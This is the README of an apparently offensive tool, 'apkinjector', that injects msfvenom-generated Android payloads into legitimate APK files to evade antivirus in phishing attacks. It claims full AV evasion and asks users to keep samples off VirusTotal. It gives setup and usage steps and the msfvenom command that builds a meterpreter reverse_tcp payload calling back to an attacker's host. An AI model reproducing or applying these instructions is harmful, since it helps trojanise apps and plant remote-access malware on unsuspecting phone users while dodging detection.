Android APK Antivirus evasion for msfvenom generated payloads to inject into another APK file for phishing attacks.
-- Please do not upload "injected" files to VirusTotal.com --
Success Rate:
-100% AV Evasion to date (0/35 on nodistribute, confirmed on AVG and Kaspersky mobile)
-~70% automatic injection
-May require user input, or manually adding the invoke command. The output will explain what is needed.
-If APKTool fails to decompile, or compile, then the injection will fail. On major apps like Facebook, Starbucks, etc you may find this to happen.
Setup:
chmod +x apkinjector
mv apkinjector /usr/local/bin/.
On first run:
-Downloads and places apktool.jar in the user's /usr/local/bin directory
-Generates debug keystore for signing. Places it in ~/.android/
NOTE: If wanting to customize each signature, then remove the keystore before running the script.
Usage:
apkinjector <payload>.apk <original>.apk
Input:
This script takes a msfgenerated payload as input along with an .apk you want to inject into.
To generate the payload: msfvenom -p android/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -o <payload>.apk
Output:
injected_<original>.apk
Debugging
Comment out the removal of the /tmp/payload and /tmp/original directories to see the file structure that was compiled.
White9shadow/apkinjector
Android APK Antivirus evasion for msfvenom generated payloads to inject into another APK file for phishing attacks.
Shell